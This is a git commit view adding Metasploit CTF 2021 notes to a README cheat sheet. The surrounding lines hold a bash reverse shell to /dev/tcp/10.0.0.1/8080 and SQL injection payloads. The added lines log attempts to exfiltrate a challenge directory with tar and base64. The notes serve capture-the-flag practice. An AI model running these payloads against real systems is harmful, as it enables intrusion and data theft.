diff options
| author | Malfurious <m@lfurio.us> | 2022-02-26 07:03:33 -0500 |
|---|---|---|
| committer | Malfurious <m@lfurio.us> | 2022-02-26 07:03:33 -0500 |
| commit | ee86bce695ef07c2356746385e1fc73f87a837d0 (patch) | |
| tree | 2ecb446e788009487aa790e437b4f30eee6b00df /README.txt | |
| parent | 7bf3df5ca773cb6141afcec2fe1c830c0cbed4a6 (diff) | |
| download | lib-des-gnux-ee86bce695ef07c2356746385e1fc73f87a837d0.tar.gz lib-des-gnux-ee86bce695ef07c2356746385e1fc73f87a837d0.zip | |
Commit notes from Metasploit CTF 2021
Signed-off-by: Malfurious <m@lfurio.us>
Diffstat (limited to 'README.txt')
| -rw-r--r-- | README.txt | 24 |
1 files changed, 24 insertions, 0 deletions
@@ -20,3 +20,27 @@ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell ' OR 1=1-- # SQL inject (pass) ' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak) curl -i -X POST -d 'a=b&c=d' -F 'f=@file;filename=asdf' URL # curl post request + + + +**How not to exfil a directory** + $ zip challenge/ + $ gzip challenge + $ ls + $ ls challenge + $ rm challenge.gz + $ man gzip + $ exit +**Log Back In** + $ gzip -k challenge + $ ls + $ base64 challenge.gz + $ exit +**Log Back In** + $ rm challenge.gz + $ tar -czf challenge + $ ls + $ tar -czf challenge.tar.gz challenge + $ ls + $ base64 challenge.tar.gz + $ exit |